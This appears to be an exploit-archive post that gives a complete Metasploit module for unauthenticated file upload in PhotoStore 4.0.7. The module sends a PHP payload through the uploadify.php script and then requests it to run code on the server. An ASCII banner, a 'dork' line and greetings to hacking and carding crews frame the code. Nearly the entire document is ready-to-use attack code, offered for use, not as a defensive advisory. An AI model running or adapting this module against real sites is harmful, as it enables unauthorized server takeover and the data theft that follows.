PhotoStore 4.0.7 Shell Upload

1. ###################################################################################​##################
2. # __________.__ _________ _________
3. # \__ ___/| |__ ____ \_ ___ \_______ ______ _ ________ \_ ___ \_______ ______ _ __
4. # | | | | \_/ __ \ / \ \/\_ __ \/ _ \ \/ \/ / ___/ / \ \/\_ __ \_/ __ \ \/ \/ /
5. # | | | Y \ ___/ \ \____| | \( <_> ) /\___ \ \ \____| | \/\ ___/\ /
6. # |____| |___| /\___ > \______ /|__| \____/ \/\_//____ > \______ /|__| \___ >\/\_/
7. # \/ \/ \/ \/ \/ \/
8. #
9. #
10. #http://tcc.sch.id
11. ###################################################################################​##################
12. # Exploit title : PhotoStore 4.0.7 shell upload
13. # Author : Gabby
14. # Dork : use ur brain ;)
15. # Vendor Site : http://www.ktools.net
16. # Software : http://www.ktools.net/photostore/
17. ###################################################################################​##################
18.  
19.  
20. ##
21. # This module requires Metasploit: http//metasploit.com/download
22. # Current source: https://github.com/rapid7/metasploit-framework
23. ##
24.  
25.  
26. require 'msf/core'
27.  
28. class Metasploit3 < Msf::Exploit::Remote
29. Rank = ExcellentRanking
30.  
31. include Msf::Exploit::Remote::HttpClient
32. include Msf::Exploit::PhpEXE
33.  
34. def initialize(info = {})
35. super(update_info(info,
36. 'Name' => 'photostore',
37. 'Description' => %q{
38. This module exploits a vulnerability found in photostore. By abusing the uploadify.php file, a malicious user can upload a file to a
39. temp directory without authentication, which results in arbitrary code execution.
40. },
41. 'Author' =>
42. [
43. 'Gabby' # metasploit module
44. ],
45. 'License' => MSF_LICENSE,
46. 'References' =>
47. [
48. [ 'URL', 'http://metasploit.com' ]
49. ],
50. 'Payload' =>
51. {
52. 'BadChars' => "\x00",
53. },
54. 'Platform' => 'php',
55. 'Arch' => ARCH_PHP,
56. 'Targets' =>
57. [
58. [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
59. [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
60. ],
61. 'DefaultTarget' => 0,
62. 'DisclosureDate' => 'dec 2013'))
63.  
64. register_options(
65. [
66. OptString.new('TARGETURI', [true, 'The full URI path to photostore', '/photostore'])
67. ], self.class)
68. end
69.  
70. def check
71. uri = target_uri.path
72. uri << '/' if uri[-1,1] != '/'
73.  
74. res = send_request_cgi({
75. 'method' => 'GET',
76. 'uri' => "#{uri}assets/uploadify/uploadify.php"
77. })
78.  
79. if not res or res.code != 200
80. return Exploit::CheckCode::Unknown
81. end
82.  
83. return Exploit::CheckCode::Appears
84. end
85.  
86. def exploit
87. uri = target_uri.path
88. uri << '/' if uri[-1,1] != '/'
89.  
90. peer = "#{rhost}:#{rport}"
91.  
92. @payload_name = "#{rand_text_alpha(5)}.php"
93. php_payload = get_write_exec_payload(:unlink_self=>true)
94.  
95. data = Rex::MIME::Message.new
96. data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
97. data.add_part("#{uri}assets/uploadify/", nil, nil, "form-data; name=\"folder\"")
98. post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
99.  
100. print_status("#{peer} - Uploading payload #{@payload_name}")
101. res = send_request_cgi({
102. 'method' => 'POST',
103. 'uri' => "#{uri}assets/uploadify/uploadify.php",
104. 'ctype' => "multipart/form-data; boundary=#{data.bound}",
105. 'data' => post_data
106. })
107.  
108. if not res or res.code != 200 or res.body !~ /#{@payload_name}/
109. fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
110. end
111.  
112. upload_uri = res.body
113.  
114. print_status("#{peer} - Executing payload #{@payload_name}")
115. res = send_request_raw({
116. 'uri' => upload_uri,
117. 'method' => 'GET'
118. })
119. end
120. end
121.  
122.  
123. ###################################################################################​##################
124. Thanks to :
125. Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, N035,
126. my sista Wii, cW3 G4pt3K, Red-x, Vanda, Deb + Sultan, Meninbox, ./Dzawa, Th3.Black.D3Vils n all my luvly friend,..
127.  
128. Greets to :
129. Yogyacarderlink, SurabayaBlackhat & Madleets Team... ^^
130. ###################################################################################​##################